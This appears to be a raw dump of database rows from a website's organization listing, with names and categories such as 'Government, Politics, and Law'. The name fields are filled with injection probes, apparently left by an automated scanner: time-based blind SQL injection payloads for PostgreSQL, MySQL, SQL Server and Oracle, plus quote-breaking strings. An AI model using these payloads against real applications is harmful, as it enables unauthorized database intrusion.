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0 | 14481 | lxbfYeaa (lxbfYeaa) lxbfYeaa????%2527%2522\'\" | http://www.example.com/ | Government, Politics, and Law | | 0 |
14480 | lxbfYeaa (lxbfYeaa) lxbfYeaa'" | http://www.example.com/ | Government, Politics, and Law | | 0 |
14479 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14478 | lxbfYeaa (lxbfYeaa) lxbfYeaa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' | http://www.example.com/ | Government, Politics, and Law | | 0 |
14477 | lxbfYeaa (@@KEKcR) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14476 | lxbfYeaa (lxbfYeaa????%2527%2522\'\") lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14475 | lxbfYeaa (lxbfYeaa'") lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14474 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14473 | lxbfYeaa (lxbfYeaa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||') lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14472 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14471 | lxbfYeaa (if(now()=sysdate(),sleep(15),0)) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14470 | lxbfYeaa (lxbfYeaa) lxbfYeaa4Fpx9ehS')) OR 450=(SELECT 450 FROM PG_SLEEP(15))-- | http://www.example.com/ | Government, Politics, and Law | | 0 |
14469 | lxbfYeaa (lxbfYeaaaTP4YAcx')) OR 107=(SELECT 107 FROM PG_SLEEP(15))--) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14468 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14467 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14466 | lxbfYeaa (lxbfYeaa) lxbfYeaaSiOppW1v') OR 846=(SELECT 846 FROM PG_SLEEP(15))-- | http://www.example.com/ | Government, Politics, and Law | | 0 |
14465 | lxbfYeaa (lxbfYeaaVBqfjZ89') OR 519=(SELECT 519 FROM PG_SLEEP(15))--) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14464 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14463 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14462 | lxbfYeaa (lxbfYeaa) lxbfYeaaRxoTAHQR' OR 509=(SELECT 509 FROM PG_SLEEP(15))-- | http://www.example.com/ | Government, Politics, and Law | | 0 |
14461 | lxbfYeaa (lxbfYeaaKcixX4h1' OR 965=(SELECT 965 FROM PG_SLEEP(15))--) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14460 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14459 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14458 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14457 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14456 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14455 | lxbfYeaa (lxbfYeaa) lxbfYeaaH1BYCF06'; waitfor delay '0:0:15' -- | http://www.example.com/ | Government, Politics, and Law | | 0 |
14454 | lxbfYeaa (lxbfYeaac9wIBMTO'; waitfor delay '0:0:15' -- ) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14453 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14452 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14451 | lxbfYeaa (lxbfYeaa) lxbfYeaa-1 waitfor delay '0:0:15' -- | http://www.example.com/ | Government, Politics, and Law | | 0 |
14450 | lxbfYeaa (lxbfYeaa-1 waitfor delay '0:0:15' -- ) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14449 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14448 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14447 | lxbfYeaa (lxbfYeaa) (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ | http://www.example.com/ | Government, Politics, and Law | | 0 |
14446 | lxbfYeaa ((select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14445 | lxbfYeaa (@@gyQpC) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14444 | lxbfYeaa (lxbfYeaa????%2527%2522\'\") lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14443 | lxbfYeaa (lxbfYeaa'") lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14442 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14441 | lxbfYeaa (lxbfYeaa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||') lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14440 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14439 | lxbfYeaa (lxbfYeaa) lxbfYeaa0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z | http://www.example.com/ | Government, Politics, and Law | | 0 |
14438 | lxbfYeaa (lxbfYeaa0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z) lxbfYeaa | http://www.example.com/ | Philanthropy and Humanism | | 0 |
14437 | lxbfYeaa (lxbfYeaaMqHe11Y7')) OR 859=(SELECT 859 FROM PG_SLEEP(15))--) lxbfYeaa | http://www.example.com/ | Government, Politics, and Law | | 0 |
14436 | lxbfYeaa (lxbfYeaa) lxbfYeaa | http://www.example.com/ | Business and Economics | | 0 |
14435 | lxbfYeaa (lxbfYeaa) lxbfYeaa0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z | http://www.example.com/ | Government, Politics, and Law | | 0 |